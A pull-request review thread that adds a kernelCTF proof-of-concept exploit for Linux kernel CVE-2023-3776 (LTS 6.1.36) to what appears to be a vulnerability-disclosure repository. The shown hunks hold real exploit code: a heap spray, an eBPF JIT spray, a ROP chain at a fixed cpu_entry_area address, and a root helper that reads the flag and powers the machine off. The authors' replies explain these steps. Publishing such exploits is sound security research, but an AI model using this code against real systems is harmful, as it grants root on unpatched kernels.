### PR TITLE
Add kernelCTF CVE-2023-3776 (lts)

### PR DESCRIPTION
**Pull request by d4em0n**

### CODE REVIEW

**Review by koczkatamas — CHANGES_REQUESTED** [review]
Hey! I've made some comments, can you please take a look and made the appropriate changes, add more explanations?

We are trying to make the submissions as understandable as possible, so it makes more easily for the community to learn from them!

Thank you!

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 1]
```diff
@@ -0,0 +1,269 @@
...
+    int fd[2];
+    for (int k = 0; k < 0x50; k++)
+    {
+        if (fork() == 0) // use fork to bypass RLIMIT_NOFILE limit.
+        {
+            close(stopfd[1]);
+            for (int i = 0; i < 0x100; i++)
+            {
+                SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, fd));
+                SYSCHK(setsockopt(fd[0], SOL_SOCKET, 26, &prog, sizeof(prog)));
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:126]: Done

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 2]
```diff
@@ -0,0 +1,269 @@
...
+            }
+            write(stopfd[0], buf, 1);
+            read(stopfd[0], buf, 1);
+            exit(0);
+        }
+    }
+    read(stopfd[1], buf, 0x10);
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:133]: Fixed inconsistent

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 3]
```diff
@@ -0,0 +1,269 @@
...
+        pthread_create(&tid, 0, job, (void*)(size_t)i);
+    read(cfd[1], buf, 0x200);
+}
+
+int sc(void)
+{
+    set_cpu(1);
+    unsigned int prog_len = 0x900;
+    struct sock_filter table[] = {
+        {.code = BPF_LD + BPF_K, .k = 0xb3909090},
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:102]: Add more comment to explain 0xb3909090

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 4]
```diff
@@ -0,0 +1,269 @@
...
+}
+void crash(char *cmd)
+{
+    int memfd = memfd_create("", 0);
+    SYSCHK(sendfile(memfd, open("root", 0), 0, 0xffffffff));
+    dup2(memfd, 666);
+    close(memfd);
+    while (check_core() == 0)
+        sleep(1);
+    *(size_t *)0 = 0;
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:160]: Add comment to tell about it

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 5]
```diff
@@ -0,0 +1,269 @@
...
+    for (int i = 0; i < 0x100; i++)
+    {
+        SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i]));
+        int n = 0x800;
+        setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n));
+        setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
+        write(sfd[i][1], buf, 0x1000);
+    }
+    pthread_t tid;
+    for (int i = 0; i < 0x200; i++)
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:92]: done

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 6]
```diff
@@ -0,0 +1,269 @@
...
+void do_spray()
+{
+    memset(payload,0,0x1000);
+    struct cmsghdr *first;
+    first = (struct cmsghdr *)payload;
+    first->cmsg_len = 0x400;
+    first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg
+    first->cmsg_type = 0x41414141;
+
+    for(int i=0x40;i<0x80;i+=0x8)
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:80]: Fix this part of code. It used to target other struct than drr_class, overwriting mulitple places is convenient for us to switch other target struct

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 7]
```diff
@@ -0,0 +1,269 @@
...
+    {
+        set_cpu(1);
+        signal(SIGFPE, handle);
+        signal(SIGTRAP, handle);
+        signal(SIGSEGV, handle);
+        setsid();
+        foo(rop);
+    }
+    sleep(1);
+    SYSCHK(sendto(c, buf, 0x10, 0, (void *)&addr, sizeof(addr)));
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:268]: It's not matter and I have added comment to explain what ths code trigger

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 8]
```diff
@@ -0,0 +1,269 @@
...
+    int c = socket(AF_INET, SOCK_DGRAM, 0);
+
+    if (fork() == 0) // Put payload in fixed kernel address (CVE-2023-0597)
+    {
+        set_cpu(1);
+        signal(SIGFPE, handle);
+        signal(SIGTRAP, handle);
+        signal(SIGSEGV, handle);
+        setsid();
+        foo(rop);
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:265]: done

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root.c [hunk 9]
```diff
@@ -0,0 +1,42 @@
...
+	int pid = strtoull(buf,0,10);
+	sprintf(path,"/proc/%d/ns/net",pid);
+	int pfd = syscall(SYS_pidfd_open,pid,0);
+	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+	dup2(stdinfd,0);
+	dup2(stdoutfd,1);
+	dup2(stderrfd,2);
+	system("cat /flag;echo o>/proc/sysrq-trigger");
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/root.c:34]: Get flag and poweroff immediately to boost next round try in PR verification workflow

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 10]
```diff
@@ -0,0 +1,269 @@
...
+    sleep(3);
+
+    struct sockaddr_in addr = {
+        .sin_family = AF_INET,
+        .sin_port = htons(80),
+        .sin_addr.s_addr = inet_addr("127.0.0.1"),
+    };
+
+    size_t rop[0x10] = {};
+    rop[0] = 0xffffffffcc000000 - 0x800;
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:255]: we spray eBPF multiple times and summarize it's often near in this page.
It's more reliabe we choose address in the middle of the page

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 11]
```diff
@@ -0,0 +1,269 @@
...
+            write(stopfd[0], buf, 1);
+            read(stopfd[0], buf, 1);
+            exit(0);
+        }
+    }
+    read(stopfd[1], buf, 0x10);
+}
+char POC[0x1000];
+
+// the payload generated from `tc class delete dev lo classid 1:10`
```
[the remark this answers is not in the document]
Comment (d4em0n) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:137]: added command to generate payload + reference for readers

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 12]
```diff
@@ -0,0 +1,269 @@
...
+        setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
+        write(sfd[i][1], buf, 0x1000);
+    }
+    pthread_t tid;
+    for (int i = 0; i < 0x200; i++)
+        pthread_create(&tid, 0, job, (void*)(size_t)i);
+    read(cfd[1], buf, 0x200);
+}
+
+int sc(void)
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:97]: In current environment, the max instructions in a program is near 0x900 and we test 0x900 instructions * 0x50 forks * 0x100 sockets * 4 = 180 MB is enough large to spray and worked reliably

File: pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c [hunk 13]
```diff
@@ -0,0 +1,269 @@
...
+{
+    memset(payload,0,0x1000);
+    struct cmsghdr *first;
+    first = (struct cmsghdr *)payload;
+    first->cmsg_len = 0x400;
+    first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg
+    first->cmsg_type = 0x41414141;
+
+    for(int i=0x40;i<0x80;i+=0x8)
+            *(size_t*)&payload[i] = 0xfffffe000003df58; //cpu_entry_area fixed kernel address
```
[the remark this answers is not in the document]
Comment (st424204) [reply pocs/linux/kernelctf/CVE-2023-3776_lts/exploit/lts-6.1.36/poc.c:81]: That address is at CPU#1 cpu_entry_area's entry_stack_page (stack address) while it try to push r15 in function error_entry

**Comment by d4em0n** [comment]
Hi, thanks for the comment.
We will fix the rest of our PRs after this one is merged because it's similar.

**Review by koczkatamas — APPROVED** [review]

**Pull request merged**